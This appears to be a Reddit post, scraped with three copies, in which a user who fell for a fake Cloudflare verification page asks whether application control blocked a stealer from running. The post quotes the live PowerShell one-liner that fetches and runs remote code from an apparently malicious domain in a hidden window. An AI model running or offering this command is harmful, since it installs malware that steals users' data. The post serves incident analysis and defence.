I fell for the CloudFlare Powershell command but am I ok?

I fell for the CloudFlare Powershell command but am I ok?

Hi everyone,

I accidentally executed a malicious PowerShell command from a fake Cloudflare "verification" page earlier today. I know better, but I made a mistake. I disconnected the machine from the internet immediately and have been analyzing the logs to see if the malware executed.

I am hoping the infection was blocked by Windows security policy (WDAC/AppLocker) before it could actually run. I want a second opinion to be absolutely sure.

The Command: powershell -w h "iex(irm 'idverification-cdn.info/3ece245b0da134dc' -UseBasicParsing)"; exit

What I’ve found in Event Viewer (Microsoft-Windows-PowerShell/Operational):

  • Event ID 4104 shows the script downloading a ZIP and an EXE.
  • Event ID 4100 shows the attempt to run the unzipped file (Verification.exe).
  • The log explicitly states: "Error Message = This command cannot be run due to the error: An Application Control policy has blocked this file."

https://pastes.io/wSzQzORf

My Questions:

  1. Given that this error triggered at the point of executing the Verification.exe payload, is it safe to assume the "stealer" logic never initialized?
  2. Looking at the script block logs (I’ve pasted the key parts below), do these scripts contain any "stealing" logic, or are they purely loaders/droppers?
  3. Is there any way the "dropper" could have exfiltrated data before the block, or do these scripts require the payload to run to perform the theft?
u/Super-Mutly — 6 days ago

I fell for the CloudFlare Powershell command but am I ok?

Hi everyone,

I accidentally executed a malicious PowerShell command from a fake Cloudflare "verification" page earlier today. I know better, but I made a mistake. I disconnected the machine from the internet immediately and have been analyzing the logs to see if the malware executed.

I am hoping the infection was blocked by Windows security policy (WDAC/AppLocker) before it could actually run. I want a second opinion to be absolutely sure.

The Command: powershell -w h "iex(irm 'idverification-cdn.info/3ece245b0da134dc' -UseBasicParsing)"; exit

What I’ve found in Event Viewer (Microsoft-Windows-PowerShell/Operational):

  • Event ID 4104 shows the script downloading a ZIP and an EXE.
  • Event ID 4100 shows the attempt to run the unzipped file (Verification.exe).
  • The log explicitly states: "Error Message = This command cannot be run due to the error: An Application Control policy has blocked this file."

https://pastes.io/wSzQzORf

My Questions:

  1. Given that this error triggered at the point of executing the Verification.exe payload, is it safe to assume the "stealer" logic never initialized?
  2. Looking at the script block logs (I’ve pasted the key parts below), do these scripts contain any "stealing" logic, or are they purely loaders/droppers?
  3. Is there any way the "dropper" could have exfiltrated data before the block, or do these scripts require the payload to run to perform the theft?
u/Super-Mutly — 6 days ago
▲ 3 r/antivirus+2 crossposts

I fell for the CloudFlare Powershell command but am I ok?

Hi everyone,

I accidentally executed a malicious PowerShell command from a fake Cloudflare "verification" page earlier today. I know better, but I made a mistake. I disconnected the machine from the internet immediately and have been analyzing the logs to see if the malware executed.

I am hoping the infection was blocked by Windows security policy (WDAC/AppLocker) before it could actually run. I want a second opinion to be absolutely sure.

The Command: powershell -w h "iex(irm 'idverification-cdn.info/3ece245b0da134dc' -UseBasicParsing)"; exit

What I’ve found in Event Viewer (Microsoft-Windows-PowerShell/Operational):

  • Event ID 4104 shows the script downloading a ZIP and an EXE.
  • Event ID 4100 shows the attempt to run the unzipped file (Verification.exe).
  • The log explicitly states: "Error Message = This command cannot be run due to the error: An Application Control policy has blocked this file."

https://privatebin.net/?28aefb63a6ace993#Hwnk2rc8vzi1b1a1jhmy5dXqaVs9Qv2FerL3hcXJuEie

My Questions:

  1. Given that this error triggered at the point of executing the Verification.exe payload, is it safe to assume the "stealer" logic never initialized?
  2. Looking at the script block logs (I’ve pasted the key parts below), do these scripts contain any "stealing" logic, or are they purely loaders/droppers?
  3. Is there any way the "dropper" could have exfiltrated data before the block, or do these scripts require the payload to run to perform the theft?
reddit.com
u/Super-Mutly — 7 days ago